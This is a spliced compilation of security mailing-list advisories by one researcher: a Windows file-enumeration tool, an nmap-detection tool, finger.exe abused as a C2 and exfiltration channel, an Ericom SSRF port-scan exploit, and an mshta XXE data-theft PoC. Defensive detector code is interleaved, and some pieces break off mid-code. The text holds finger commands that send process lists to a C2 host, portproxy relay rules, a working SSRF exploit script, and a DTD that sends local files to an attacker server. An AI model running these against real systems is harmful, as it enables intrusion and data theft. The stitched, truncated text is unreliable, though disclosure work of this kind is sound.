# Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
#
# NtFileSins is a Windows File Enumeration Intel Gathering Tool.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by comparing inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#   2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by comparing NTFS error messages to potentially learn their activities or machine's purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.

#From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe
#or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass.

#Example, if malware hides itself by unlinking itself from the EPROCESS list in memory or using programs like WinRAP to hide
#processes from Windows TaskMgr, we may not discover them even if using the tasklist command. The EPROCESS structure and flink/blink is
#how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
#malicious code happens to reside on disk and not only in memory. What's cool is we can do this without the need for admin rights.
#
#Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icacls, and cd.
#However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages.

#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.2 (c)   #
# By John Page (aka hyp3rlinx) #
# Apparition Security  #
#==#

BANNER='''
_   ___ ___ _
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  )
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_// v2.2 (c)

  By hyp3rlinx
  ApparitionSec


'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop",

[FD] Recon Informer v1.2 - Intel for offensive systems tool.

2020-10-06 Thread hyp3rlinx
import logging,os,ctypes,sys,argparse,time,re
from subprocess import *
from datetime import datetime
from pkgutil import iter_modules
import pkg_resources

#Recon Informer (c) v1.2
#By John Page (hyp3rlinx)
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#apparition...@gmail.com
#PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
#==
#v1.2 fixed: window title bug, removed pygetwindow module.
#
#Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive
#security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
#
#Purpose:
#Recon-Informer is NOT meant for protecting public facing or LAN critical enterprise systems whatsoever.
#Its purpose is to detect possible recon against our attacker system on a LAN to provide us defensive intel.
#Therefore, this script is most useful for basic short-term defensive visibility.
#
#Features:
#Attempt to detect and identify typical port scans generated using Nmap including scan type.
#-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
#
#FYI, scans such as FIN don't work well on Windows OS and firewalls can make scans return incorrect results.
#XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
#NULL is another type that doesn't work well on Windows.
#
#However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS
#it's run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
#With -s flag you can add extra scan types to detect that otherwise would be ignored.
#
#PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
#Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you
#will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
#requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag.
#
#ICMP
#Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping.
#
#BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS.
#Firewall rules for blocks are in-bound "ANY" but still allow out-bound.
#FW rules are named like ReconInformer_.
#
#DELETE FW RULE -d  to remove FW rules for blocked hosts.
#
#WHITELIST -w HOST-IP(s) you never want to block on.
#
#FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOS 137 etc.
#ignore packets destined for specific ports to try to reduce false positive probe alerts.
#
#IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS
#from SMB connected shares to try to reduce false positives.
#
#LOG -l flag, default size limit for writing to disk is 1MB.
#
#UDP protocol is ignored by default to try to reduce false positives from sources like NetBIOS, SNMP etc.
#To detect UDP scans use the -u flag, then can also combine with -f port filter
#(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
#
#PCAP saving -s flag, default size limit is also 1MB.
#
#RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect.
#
#Private Network range:
#Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored.
#
#BYPASS examples --scanflags and custom packet window sizes:
#Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
#
#These scans can bypass Recon-Informer and correctly report open ports found.
#nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
#nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
#
#Therefore, I accounted for some of these in Recon-Informer to report these detections.
#
#SCANFLAGS
#nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
#nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
#nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothing useful returned)
#nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
#nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
#
#The above scanflag examples, would have bypassed detection if we didn't check packets for them.
#Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks:
#
#10  (0x0a) SYNPSH
#34  (0x22) SYNURG
#42  (0x2a) SYNPSHURG
#66  (0x42) SYNECN
#74  (0x4a) SYNPSHECN
#98  (0x62) SYNURGECN
#106 (0x6a) SYNPSHURGECN
#130 (0x82) SYNCWR
#138 (0x8a) SYNPSHCWR
#162 (0xa2) SYNURGCWR
#170 (0xaa) SYNPSHURGCWR
#194 (0xc2) SYNECNCWR
#202 (0xca) SYNPSHECNCWR
#226 (0xe2) SYNURGECNCWR
#234 (0xea) SYNPSHURGECNCWR
#
#Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!.
#ip=IP(dst="192.168.1.104")
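As an added example (not Recon-Informer's code, for either the v1.3 or the v1.2 post above), the scanflag table turned into a flag decoder and a small per-source classifier: it labels a probe by its TCP flag combination in the table's own SYN/PSH/URG/ECN/CWR naming, catches the SYN-plus-extra-flags cases a plain "flags == SYN" check misses, and treats the 1024 window only as corroboration, since the text shows a 666-byte window defeats a window-based check. The packet summaries and the alert threshold are constructed for the example.

```python
# Added example, not Recon-Informer's own code. It turns the scanflag table
# above into a decoder and a small per-source scan classifier; the packet
# summaries it runs on are constructed for the example.
from collections import defaultdict

# Standard TCP flag bits (RFC 793, ECE/CWR from RFC 3168), listed in the order
# the table above spells them so that 0x2a decodes to "SYNPSHURG".
FLAG_BITS = [("SYN", 0x02), ("PSH", 0x08), ("URG", 0x20), ("ECN", 0x40),
             ("CWR", 0x80), ("FIN", 0x01), ("RST", 0x04), ("ACK", 0x10)]
FLAG = dict(FLAG_BITS)
NMAP_SYN_WINDOW = 1024          # typical -sS window size noted above
SCAN_PORT_THRESHOLD = 3         # distinct ports from one source before alerting (assumed)


def decode_tcp_flags(value):
    """Return the concatenated flag names for one TCP flags byte, e.g. 0x42 -> 'SYNECN'."""
    if not 0 <= value <= 0xFF:
        raise ValueError("TCP flags field is a single byte")
    return "".join(name for name, bit in FLAG_BITS if value & bit) or "NULL"


def classify_probe(flags):
    """Label a TCP segment by its flag combination.

    SYN-SCANFLAGS is the case the table above is about: a SYN without ACK that
    also carries PSH, URG, ECN or CWR, which a plain 'flags == SYN' check misses.
    """
    extras = FLAG["PSH"] | FLAG["URG"] | FLAG["ECN"] | FLAG["CWR"]
    if flags == 0:
        return "NULL"
    if flags == FLAG["FIN"]:
        return "FIN"
    if flags == FLAG["FIN"] | FLAG["PSH"] | FLAG["URG"]:
        return "XMAS"
    if flags == FLAG["FIN"] | FLAG["ACK"]:
        return "MAIMON"
    if flags & FLAG["SYN"] and not flags & FLAG["ACK"]:
        return "SYN-SCANFLAGS" if flags & extras else "SYN"
    if flags == FLAG["ACK"]:
        return "ACK"
    return "OTHER"


def detect_scans(packets, threshold=SCAN_PORT_THRESHOLD):
    """Group inbound TCP probes by source and report sources that touched
    `threshold` or more distinct destination ports with scan-like flags.

    Each packet is a dict with keys src, dport, flags and window. The result
    maps source IP -> {"type", "ports", "flags", "nmap_window"}; nmap_window
    only records whether the 1024 window was seen, it never decides the alert.
    """
    per_src = defaultdict(lambda: {"ports": set(), "labels": set(),
                                   "flags": set(), "nmap_window": False})
    for pkt in packets:
        label = classify_probe(pkt["flags"])
        if label == "OTHER":
            continue                     # established-connection traffic
        entry = per_src[pkt["src"]]
        entry["ports"].add(pkt["dport"])
        entry["labels"].add(label)
        entry["flags"].add(decode_tcp_flags(pkt["flags"]))
        entry["nmap_window"] |= pkt.get("window") == NMAP_SYN_WINDOW

    alerts = {}
    for src, entry in per_src.items():
        if len(entry["ports"]) >= threshold:
            alerts[src] = {"type": "/".join(sorted(entry["labels"])),
                           "ports": sorted(entry["ports"]),
                           "flags": sorted(entry["flags"]),
                           "nmap_window": entry["nmap_window"]}
    return alerts


# Constructed sample: a --scanflags=SYNPSHURG sweep using the 666-byte window
# from the note above, plus one ordinary connection attempt that must not alert.
SAMPLE_PACKETS = [
    {"src": "192.168.1.50", "dport": 21, "flags": 0x2a, "window": 666},
    {"src": "192.168.1.50", "dport": 135, "flags": 0x2a, "window": 666},
    {"src": "192.168.1.50", "dport": 139, "flags": 0x2a, "window": 666},
    {"src": "192.168.1.50", "dport": 445, "flags": 0x2a, "window": 666},
    {"src": "192.168.1.7", "dport": 445, "flags": 0x02, "window": 64240},
]

if __name__ == "__main__":
    for src, info in detect_scans(SAMPLE_PACKETS).items():
        print(src, info)
```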

[FD] Windows TCPIP Finger Command / C2 Channel and Bypassing Security Software

2020-09-11 Thread hyp3rlinx
[+] Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security
Software
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS,
can be used as a file downloader and makeshift C2 channel.
Legitimate use of Windows Finger Command is to send Finger Protocol queries
to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk
using the command line redirection operator ">".

Intruders who compromise a computer may find it is locked down and
"unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, it's possible they may be
whitelisted by installed security programs and allowed to download files.

Redteams and such using LOL methods have made use of "Certutil.exe", a native
Windows program, for downloading files. However, Certutil.exe is
recently blocked by Windows Defender Antivirus and logged as event
"Trojan:Win32/Ceprolad.A" when it encounters http/https://.

Therefore, using Windows finger we can bypass current Windows Defender
security restrictions to download tools, send commands and exfil data.
The Finger protocol as a C2 channel part works by abusing the "user" token
of the FINGER Query protocol "user@host". C2 commands masked as
finger queries can download files and or exfil data without Windows
Defender interference.

Download files:
C:\> finger @HOST > Malwr.txt

Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21

Typically, (Port 79) default port used by FINGER protocol is often blocked
by organizations. Privileged users can bypass this using
Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions
to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the Local Machines ip-address
which are then forwarded to the C2 server specified.

Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79
connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43
connectaddress=[LOCAL-IP] connectport=79

To display Portproxy use "C:\>netsh interface portproxy show all".

E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt

E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt

To leverage Windows finger.exe successfully as a file downloader and help
evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename
for the Finger Protocol Host token part for file downloads.

DarkFinger C2 expects exfil data to be prefixed with the dot "." character, so
any arbitrary inbound queries are not confused for exfil.
This can be changed to whatever or even expanded upon to use XOR
obfuscation methods etc... as this is just for basic PoC.

[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.

"Windows Defender Antivirus has taken action to protect this machine from
malware or other potentially unwanted software.

  Name: Trojan:Win32/Ceprolad.A
  ID: 2147726914
  Severity: Severe
  Category: Trojan
... etc"

PowerShell, also used as an LOL method to download files usually generates
Windows event logs. Finger initiated downloads write
to disk and will leave forensic artifacts. Finger TCP/IP traffic going out
to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found
no trace of it generating Windows event logs anywhere.

DarkFinger.py C2 is very basic with no security. It's only to demonstrate
using Windows Finger Command as a C2 channel
and show the possibilities. Therefore, anyone can request to change the
Port DarkFinger C2 listens on and or download files.

During my research, I found nothing on the internet publicly using or
documenting Windows TCPIP Finger Command for use as C2 channel.
Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat"
which calls the Windows finger.exe in attacker friendly ways.

Tested successfully Windows 10.


[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT

#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can ch
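As an added example (not DarkFinger's code and not from the post), a rule set that flags the three behaviours described above in process-creation records: finger.exe with its output redirected to a file, finger queries whose "user" token is data rather than a username (the tasklist loop and the "." exfil prefix), and netsh portproxy rules on ports 79 or 43. The records are constructed; the assumption is that command-line auditing (Sysmon Event ID 1 or Security event 4688 with command-line logging) is feeding them.

```python
# Added example, not DarkFinger's or Windows' own code: a small rule set that
# flags the finger.exe and netsh portproxy usage described above in
# process-creation records (image, cmdline, parent pid). The records below are
# constructed for the example.
import re

REDIRECT = re.compile(r">\s*\S+")                  # response written to a file
FINGER_QUERY = re.compile(r"(\S+)@(\S+)")           # user@host token
DATA_LIKE_USER = re.compile(r"^\.|\.(exe|dll|txt|bat|dat|log)$", re.IGNORECASE)
PORTPROXY = re.compile(r"netsh\s+interface\s+portproxy\s+add", re.IGNORECASE)
PORT_ARG = re.compile(r"(listenport|connectport)=(\d+)", re.IGNORECASE)
FINGER_PORTS = {"79", "43"}   # finger and the WHOIS port from the netsh lines above


def image_name(record):
    return record["image"].rsplit("\\", 1)[-1].lower()


def check_record(record):
    """Findings for one process-creation record (keys: image, cmdline, ppid)."""
    findings = []
    cmd = record["cmdline"]
    if image_name(record) == "finger.exe":
        if REDIRECT.search(cmd):
            findings.append("finger.exe output redirected to a file (downloader use)")
        m = FINGER_QUERY.search(cmd)
        if m and DATA_LIKE_USER.search(m.group(1).strip('"')):
            findings.append("finger user token looks like data, not a username: " + m.group(1))
    elif image_name(record) == "netsh.exe" and PORTPROXY.search(cmd):
        hit = {p for _, p in PORT_ARG.findall(cmd)} & FINGER_PORTS
        if hit:
            findings.append("portproxy rule on port(s) " + ",".join(sorted(hit)))
    return findings


def scan_records(records, burst=5):
    """Run check_record over all records; additionally flag every finger.exe
    launch whose parent spawned `burst` or more of them (the for /f loop
    exfil pattern above). Returns {record index: [findings]}."""
    results = {}
    finger_by_parent = {}
    for i, rec in enumerate(records):
        found = check_record(rec)
        if found:
            results[i] = found
        if image_name(rec) == "finger.exe":
            finger_by_parent.setdefault(rec["ppid"], []).append(i)
    for ppid, idxs in finger_by_parent.items():
        if len(idxs) >= burst:
            for i in idxs:
                results.setdefault(i, []).append(
                    "one of %d finger.exe launches from parent pid %d" % (len(idxs), ppid))
    return results


# Constructed records: the download, the portproxy setup and the tasklist
# exfil loop from the text above, plus one ordinary finger query that must
# stay clean. Addresses are documentation/RFC 1918 values, not real hosts.
SYS32 = r"C:\Windows\System32"
SAMPLE_RECORDS = [
    {"image": SYS32 + r"\finger.exe", "cmdline": "finger @192.168.1.21 > Malwr.txt", "ppid": 4242},
    {"image": SYS32 + r"\netsh.exe", "ppid": 4242, "cmdline":
        "netsh interface portproxy add v4tov4 listenaddress=10.0.0.5 listenport=79 "
        "connectaddress=203.0.113.9 connectport=43"},
    {"image": SYS32 + r"\finger.exe", "cmdline": "finger alice@bsd.example.org", "ppid": 5150},
] + [
    {"image": SYS32 + r"\finger.exe", "cmdline": "finger %s@192.168.1.21" % p, "ppid": 4242}
    for p in ("System", "smss.exe", "csrss.exe", "lsass.exe", "svchost.exe")
]

if __name__ == "__main__":
    for idx, found in sorted(scan_records(SAMPLE_RECORDS).items()):
        print(idx, SAMPLE_RECORDS[idx]["cmdline"], "->", found)
```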

[FD] CVE-2020-24548 / Ericom Access Server for (AccessNow & Ericom Blaze) v9.2.0 / Server Side Request Forgery

2020-08-25 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.ericom.com


[Product]
Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0

AccessNow is an HTML5 remote desktop gateway that works from any device
with an HTML5 compatible browser,
including from Chromebooks and locked down devices. Ericom Blaze provides
remote desktop connectivity from
Mac, Windows and Linux devices to applications on office / home PCs and
virtual desktops (VDI).


[Vulnerability Type]
Server Side Request Forgery


[CVE Reference]
CVE-2020-24548


[Security Issue]
Ericom Access Server allows attackers to initiate SSRF requests making outbound
connections to arbitrary hosts and TCP ports. Attackers, who can reach the
AccessNow server can target internal systems that are behind firewalls that are
typically not accessible. This can also be used to target third-party systems
from the AccessNow server itself.

The AccessNow server will return an attacker friendly response, exfiltrating
which ports are listening for connections. This can bypass Firewall rules and
undermine the integrity of other systems and security controls in place.

E.g. listen using Netcat, Nc64.exe -llvp 25

A) Ericom Server  192.168.88.152 (defaults port 8080)
B) Attacker   192.168.88.162
C) Victim  192.168.1.104

Using Wireshark we can observe A sends a SYN packet to C (port 25)
C sends SYN/ACK to A
A sends ACK to C.
A sends ACK/FIN to C port 25.

We will then get an AccessNow server response similar to below.
["C","M",["Cannot connect to '192.168.1.104:25'.",true]]

This message indicates we cannot connect and helpfully informs us of closed
vs open ports.

[Affected Component]
Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports
which are sent using Web-Socket requests. Ericom server then replies with a
"Cannot connect to" message if a port is in a closed state.


[Attack Vectors]
Remote attackers can abuse the Ericom Access Server to conduct port
scans on arbitrary systems. This is possible due to a server side
request forgery vulnerability and using a remote TCP socket program.


[Impact Information Disclosure]
true


[CVE Impact Other]
Exfiltration of open ports


[Exploit/POC]
import sys,ssl
import websocket
##pip install websocket-client   #Required

#By hyp3rlinx
#ApparitionSec
#
#Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF
#

BANNER="""
  __  _
 |  |/ |
 | |__   _ __ _ __ ___  _ __| | ___  _ __ ___
 |  __| | '__| '__/ _ \| '__| |/ _ \| '_ ` _ \
 | || |  | | | (_) | |  | |___| (_) | | | | | |
 |__|_|  |_|  \___/|_|   \_\___/|_| |_| |_|
   SSRF Exploit
"""

def ErrorCom(vs,vp,t,p):
    try:
        ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE})
        ws.send("SSRF4U!")
        result =  ws.recv()
        #print(result)
        if result.find("Cannot connect to")==-1:
            print("[+] Port "+p+" is open for business :)")
        else:
            print("[!] Port " + p+ " is closed :(")
        ws.close()
    except Exception as e:
        print(str(e))

if __name__=="__main__":

    if len(sys.argv) != 5:
        print(BANNER)
        print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548")
        print("[+] By Hyp3rlinX / ApparitionSec")
        print("[!] Usage: ,,,")
        exit()

    if len(sys.argv[4]) > 5:
        print("[!] Port out of range")
        exit()

    print(BANNER)
    ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])




[PoC Video URL]
https://www.youtube.com/watch?v=oDTd-yRxVJ0


[Network Access]
Remote


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification : June 21, 2020
Received automated reply : June 21, 2020
Request for status : June 30, 2020
Vendor "Forwarded all the detail to our R and Management team" : June 30, 2020
Request for status : July 13, 2020
No vendor response
Informed vendor advisory: August 11, 2020
Request for status : August 20, 2020
No vendor response
August 22, 2020 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is 
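As an added example (not Ericom's code and not from the advisory), the gateway-side check that closes this class of SSRF: the caller-supplied /blaze/<host>:<port> target from the PoC above is parsed, matched exactly against an allowlist of published back ends, and every refusal or failure gets one identical reply, so the response can no longer act as an open/closed port oracle. The allowlist entries and the reply message texts are assumptions; only the path shape and the ["C","M",[message,true]] reply layout come from the advisory.

```python
# Added example, not Ericom's code: a gateway-side policy check for the
# '/blaze/<host>:<port>' target path shown in the PoC above. The allowlist and
# the message texts are constructed for the example.

# Back ends this gateway is published to reach, with the ports it may dial.
# Exact strings only: no wildcards, no CIDR, and no DNS resolution here,
# because resolving a caller-supplied name would reopen the hole.
ALLOWED_TARGETS = {
    "rdp-01.corp.example": {3389},
    "192.168.88.20": {3389, 443},
}

# One reply for every refused or failed request, so the text cannot serve as
# the open/closed port oracle described above.
UNIFORM_ERROR = ["C", "M", ["Connection refused by gateway policy.", True]]


def parse_blaze_target(path):
    """Split '/blaze/host:port' into (host, port); raise ValueError otherwise."""
    parts = path.split("?", 1)[0].split("/")
    if len(parts) != 3 or parts[1] != "blaze" or not parts[2]:
        raise ValueError("not a /blaze/<host>:<port> path")
    host, sep, port = parts[2].rpartition(":")
    if not sep or not port.isdigit() or not 1 <= int(port) <= 65535:
        raise ValueError("missing or invalid port")
    host = host.strip("[]").lower()          # tolerate bracketed IPv6 literals
    if not host:
        raise ValueError("empty host")
    return host, int(port)


def is_allowed_target(host, port, allowlist=ALLOWED_TARGETS):
    """Exact host match and port membership; anything else is refused."""
    ports = allowlist.get(host)
    return ports is not None and port in ports


def gateway_decision(path, allowlist=ALLOWED_TARGETS):
    """Return ('connect', host, port) for an allowed target, else
    ('reply', UNIFORM_ERROR). Malformed paths get the same reply as
    disallowed ones, so the parser does not become a second oracle."""
    try:
        host, port = parse_blaze_target(path)
    except ValueError:
        return ("reply", UNIFORM_ERROR)
    if not is_allowed_target(host, port, allowlist):
        return ("reply", UNIFORM_ERROR)
    return ("connect", host, port)


def backend_reply(connected):
    """Even when an allowed connect attempt fails, the client sees the same
    text as for a policy refusal; the detail belongs in the server log only."""
    return ["C", "M", ["Connected.", False]] if connected else UNIFORM_ERROR


if __name__ == "__main__":
    for p in ("/blaze/192.168.1.104:25", "/blaze/rdp-01.corp.example:3389"):
        print(p, "->", gateway_decision(p))
```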

[FD] Microsoft Windows mshta.exe HTA File / XML External Entity Injection

2020-07-07 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MSHTA-HTA-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows MSHTA.EXE .HTA File


An HTML Application (HTA) is a Microsoft Windows program whose source
code consists of HTML, Dynamic HTML, and one or more
scripting languages supported by Internet Explorer, such as VBScript
or JScript. The HTML is used to generate the
user interface, and the scripting language is used for the program
logic. An HTA executes without the constraints
of the internet browser security model; in fact, it executes as a
"fully trusted" application.


[Vulnerability Type]
XML External Entity Injection


[Impact]
Information disclosure, Recon


[CVE Reference]
N/A


[Security Issue]
Windows mshta.exe allows processing of XML External Entities; this can
result in local data-theft and or program reconnaissance upon opening
specially crafted HTA files. From an attacker perspective, since we
are not dependent on scripting languages like Javascript, VBScript or
WScript.Shell, we may have better chances at subverting endpoint
protection systems as we are only using XML markup.

HTA exploits found online typically show code execution, with reliance
on ActiveX Objects and scripting engines and hence are more
easily detected by security products. Many of these exploits also use
payload obfuscation techniques for stealth. However, I found nothing
publicly documented that leverages XML injection targeting the
mshta.exe HTA file-type.

Yea I know, no code execution. However, we get stealthy data theft
with recon capabilities. Armed with this info, we can more accurately
target potential software vulnerabilities at a later date from info
gathering a systems program installations. Usually, this type of recon
is seen in first-stage malware infections using the Windows
CreateToolhelp32Snapshot API.

Therefore, since there are no documented HTA exploits using XXE attacks
for this file type, I release the advisory.
Successfully tested on Windows 10 and Windows Servers 2016, 2019.


[Exploit/POC]
Multi program recon and check if running in a Virtual Machine all in a
single HTA file, change IP accordingly.

1) "Doit.hta"





http://127.0.0.1:8000/datatears.dtd;>
%dtd;]>






http://127.0.0.1:8000/datatears.dtd;>
%dtd;]>






http://127.0.0.1:8000/datatears.dtd;>
%dtd;]>





2) The "datatears.dtd" DTD file hosted on attackers server.


http://127.0.0.1:8000?%file;'>">
%all;


3) Local Python v3 web-server listening on port 8000 to receive victims info.

python -m http.server


[POC Video URL]
https://www.youtube.com/watch?v=XaTrBEu4Ghw


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
MSHTA .HTA files are classified untrusted, many threats already well known.
July 4, 2020 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
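As an added example (not from the advisory above), a static check a mail gateway or endpoint scanner can run over an .hta or .dtd before mshta.exe ever parses it: it reports the XXE building blocks the advisory relies on, namely DOCTYPE internal subsets with SYSTEM or parameter entities, %name; references, and entity literals that declare further entities (the datatears.dtd pattern). The sample HTA and DTD texts are constructed from the fragments visible above; the DTD host in the HTA sample is a placeholder.

```python
# Added example, not from the advisory: a static XXE-indicator check for HTA
# and DTD text. The samples are constructed; ATTACKER-PLACEHOLDER is not a host.
import re

DOCTYPE = re.compile(r"<!DOCTYPE\b[^\[>]*(?:\[.*?\])?\s*>", re.IGNORECASE | re.DOTALL)
ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.:-]+)\s+"
    r"(?:(?P<ext>SYSTEM|PUBLIC)\s+)?"
    r"(?P<vals>(?:\"[^\"]*\"|'[^']*')(?:\s+(?:\"[^\"]*\"|'[^']*'))?)",
    re.IGNORECASE)
QUOTED = re.compile(r"\"([^\"]*)\"|'([^']*)'")
PARAM_REF = re.compile(r"%([\w.:-]+);")
REMOTE_SCHEMES = ("http", "https", "ftp")


def scan_dtd_text(text):
    """Findings for every ENTITY declaration and parameter reference in text."""
    findings = []
    for m in ENTITY_DECL.finditer(text):
        values = [a or b for a, b in QUOTED.findall(m.group("vals"))]
        kind = "parameter" if m.group("param") else "general"
        if m.group("ext"):
            uri = values[-1]                      # PUBLIC has pubid first, URI last
            scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
            where = ("remote" if scheme in REMOTE_SCHEMES
                     else "local file" if scheme == "file" else "external")
            findings.append("%s entity '%s' loads %s resource %s"
                            % (kind, m.group("name"), where, uri))
        else:
            literal = values[0]
            # A literal that itself contains an ENTITY declaration, an encoded
            # '%' (&#x25;) or a %name; reference is the nested-declaration trick.
            if ("<!ENTITY" in literal.upper() or "&#x25;" in literal.lower()
                    or PARAM_REF.search(literal)):
                findings.append("%s entity '%s' builds a nested entity declaration"
                                % (kind, m.group("name")))
    refs = sorted(set(PARAM_REF.findall(text)))
    if refs:
        findings.append("parameter entity reference(s): "
                        + ", ".join("%" + r + ";" for r in refs))
    return findings


def classify_hta(text):
    """Only the DOCTYPE declarations are inspected, so ordinary HTA markup
    and script (which may contain stray '%' characters) cannot trigger the
    parameter-reference check."""
    subsets = DOCTYPE.findall(text)
    findings = [f for s in subsets for f in scan_dtd_text(s)]
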